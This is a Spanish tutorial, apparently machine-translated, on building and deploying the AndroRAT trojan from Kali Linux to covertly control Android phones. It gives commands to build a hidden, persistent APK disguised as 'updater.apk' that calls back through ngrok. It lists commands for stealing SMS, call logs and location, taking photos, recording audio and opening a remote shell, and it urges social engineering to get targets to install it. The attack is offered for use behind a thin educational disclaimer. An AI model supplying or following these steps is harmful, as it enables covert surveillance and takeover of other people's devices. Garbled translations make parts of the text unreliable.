Tutoriales

Cómo monitorear de forma remota cualquier dispositivo Android

Android es el sistema operativo móvil más popular del mundo en la actualidad. En el artículo de hoy, aprenderemos»Cómo monitorear de forma remota su dispositivo Android ?» Para hacer esto, usaremos Kali Linux con una aplicación maliciosa.

Con este enfoque, los padres pueden controlar los dispositivos móviles de sus hijos y las empresas pueden controlar lo que hacen los empleados en los dispositivos proporcionados por la empresa. Básicamente, podemos usarlo para monitorear cualquier dispositivo Android.

Para esto usaremos rata machoEl nombre lo dice todo, Andro para Android y RAT es una herramienta/troyano de acceso remoto. AndroRAT está diseñado para controlar y recibir información de forma remota de los sistemas Android. Es una aplicación cliente/servidor desarrollada en Java Android para el cliente y el servidor en Python.

AndroRAT funcionará en dispositivos desde Android 4.1 (Jellybean) hasta Android 9 (Oreo) (API 16 a API 28). Esta RAT también funciona en Android 10, pero algunos comandos del intérprete serán inestables.

  • Puerta trasera totalmente persistente.
  • Iconos que no son visibles después de la instalación.
  • La aplicación ligera se ejecuta las 24 horas del día, los 7 días de la semana en segundo plano.
  • Utiliza muy pocos recursos, así que no lo dudes.
  • Iniciar automáticamente después de reiniciar.
  • Audio y toma de fotografías de ambas cámaras.
  • Explorar llamadas y mensajes de texto.
  • Obtenga la ubicación actual, los detalles de la tarjeta SIM, la IP, la dirección MAC del dispositivo.

Primero necesitamos instalar Python3 en nuestro sistema Kali Linux. Esto lo podemos hacer con el siguiente comando:

sudo apt install python3 python3-pip

En la siguiente captura de pantalla, podemos ver el resultado del comando anterior:

Instalar python3 en kali

ahora necesitamos Instalar y configurar Java 8 (OpenJDK 8) en nuestro sistema. Lo hemos demostrado en un artículo anterior.

Ahora tenemos que clonar rata macho Use el siguiente comando de GitHub en nuestro sistema:

git clone https://github.com/karma9874/AndroRAT

Podemos ver el resultado en la siguiente captura de pantalla:

Clonar AndroRAT desde GitHub

Ahora necesitamos movernos al directorio AndroRAT usando MV Pedido:

mv AndroRAT

Luego necesitamos instalar todos los requisitos de AndroRAT con el siguiente comando:

pip3 install -r requirements.txt
requisitos de instalacion androrata

En la captura de pantalla anterior podemos ver el proceso de instalación del requisito.Después de eso necesitamos instalar ngrok y configure el token de autenticación ngrok en nuestro sistema, ya lo tenemos configurado en nuestro sistema Publicación anteriorNecesitamos seguir ese artículo para configurar ngrok en nuestro sistema.

Ahora podemos construir el archivo APK malicioso (carga útil), para esto necesitamos ejecutar el siguiente comando:

python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk

En el comando anterior, podemos ver que usamos Android RAT.py script de python y construimos nuestra carga usando – Hospedarse bandera, entonces usamos –ngrok ya que ya tenemos la configuración de ngrok en nuestro sistema (esto sería más fácil, de lo contrario podríamos usar nuestra dirección IP -Una generación flag, con ngrok podemos iniciar fácilmente el oyente).Si queremos, podemos configurar un icono para la aplicación usando – Icono La bandera va seguida de la ruta del archivo del icono en nuestro sistema, pero esta carga útil se ejecuta en segundo plano, por lo que la omitiremos.Luego configuramos un puerto para este servicio, luego configuramos el nombre del archivo de salida usando -o bandera. La siguiente captura de pantalla muestra el resultado del comando anterior:

Construir carga útil con android

En la captura de pantalla anterior, podemos ver que AndroRAT está creando y firmando el archivo apk, y también podemos ver el archivo de salida (updater.apk) en nuestro escritorio. Después de completar el proceso de compilación, automáticamente iniciará el oyente como se muestra en la imagen a continuación:

androrata oyente

En la captura de pantalla anterior, podemos ver que el oyente de AndroRAT está activo y esperando una conexión. Ahora podemos enviar nuestro archivo apk a un dispositivo Android a través de la ingeniería social y convencer a nuestros usuarios objetivo para que lo instalen. Para mostrar la demostración, instalaremos la carga útil en nuestra propia tableta Android. Podemos ver que obtuvimos la conexión en la siguiente captura de pantalla:

use android para conectarse con un dispositivo android

Aquí podemos ejecutar varios comandos. Verifique la lista de comandos dada a continuación:

  • deviceInfo –> Devuelve la información básica del dispositivo
  • camList –> devolver ID de cámara
  • película [cameraID] –> Tomar foto de la cámara
  • iniciar vídeo [cameraID] –> comenzar a grabar video
  • stopVideo -> detener la grabación de video y mostrar el archivo de video
  • startAudio –> comenzar a grabar audio
  • stopAudio –> detener la grabación de audio
  • Obtener SMS [inbox|sent] –> devolver sms de bandeja de entrada o enviar sms en archivo
  • getCallLogs –> devolver registros de llamadas en el archivo
  • shell –> iniciar el shell sh del dispositivo
  • aleteo [number_of_times] –> Tiempos del dispositivo de vibración
  • getLocation –> devuelve la ubicación actual del dispositivo
  • getIP –> devuelve la ip del dispositivo
  • getSimDetails –> Devuelve los detalles de todas las tarjetas SIM del dispositivo
  • borrar –> borrar pantalla
  • getClipData –> mostrar el texto actual en el portapapeles
  • getMACAddress –> devuelve la dirección mac del dispositivo
  • salir –> salir del intérprete

Podemos ejecutar el comando anterior para monitorear el dispositivo Android.Por ejemplo, corremos Obtener bandeja de entrada de SMS Comando para ver la bandeja de entrada de nuestro objetivo. Salida que se muestra en la siguiente captura de pantalla:

Obtener lista de SMS de dispositivos Android

En la captura de pantalla anterior, podemos ver que los mensajes de texto de la bandeja de entrada de la víctima se guardan en nuestro directorio resaltado.

Asimismo, si queremos hacer una foto, tenemos que ejecutar Lista de cámaras Primero comando, luego mostrará la lista de cámaras en ese dispositivo.Entonces podemos usar película Pedido. Como se muestra en la siguiente captura de pantalla:

Toma de fotografías desde la cámara trasera

También podemos abrir el indicador de shell del dispositivo Android de destino usando cascarón Pedido. Después de obtener la terminal de destino del dispositivo víctima, podemos controlar el dispositivo desde nuestro sistema Kali Linux.

  1. Hemos utilizado el servicio ngrok, pero el servicio ngrok no es tan estable. Si necesitamos una conexión estable, debemos usar nuestra dirección IP pública estática y reenviar nuestro puerto usado.
  2. Si el dispositivo de destino tiene activado el modo de ahorro de energía, nuestra carga útil no obtendrá una conexión inversa.
  3. Algunos comandos del intérprete pueden ser inestables si nuestro dispositivo de destino tiene Android 11 o superior.
  4. Necesitamos algunas excelentes técnicas de ingeniería social para engañar a nuestro objetivo e instalar la carga útil, después de la instalación debe hacer clic en «Abierto«. Después de eso, la carga útil se ocultará.

advertir:- Este artículo es solo para fines experimentales y educativos. Lo probamos en nuestro propio dispositivo para mostrar la demostración. Hackear el dispositivo de otra persona sin los permisos adecuados es ilegal y puede considerarse un delito penal. No somos responsables si alguien hace algo mal. Hágalo bajo su propio riesgo.

Esto es ¿Cómo podemos controlar o monitorear de forma remota los dispositivos Android? Desde nuestro sistema Kali Linux. Este método se muestra con fines educativos y también difunde la conciencia de ciberseguridad de cómo pueden piratear nuestros sistemas.

¿Te gustan nuestros artículos? asegurarse Síguenos Obtenga todos nuestros artículos directamente en la notificación.también podemos Gorjeo y GitHub, donde publicamos actualizaciones de artículos.Únete a nosotros KaliLinuxEn familia, únete a nosotros grupo de telegramasEstamos trabajando arduamente para construir una comunidad para Linux y la seguridad de la red.Para cualquier cosa, siempre estamos felices de ayudar a todos. Área de comentariosComo sabemos, nuestra sección de comentarios siempre está abierta a todo el mundo.Leemos cada comentario y siempre respondemos.

LEER  Solucionar problemas de audio en Intel NUC en Debian 11 (salida virtual)

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba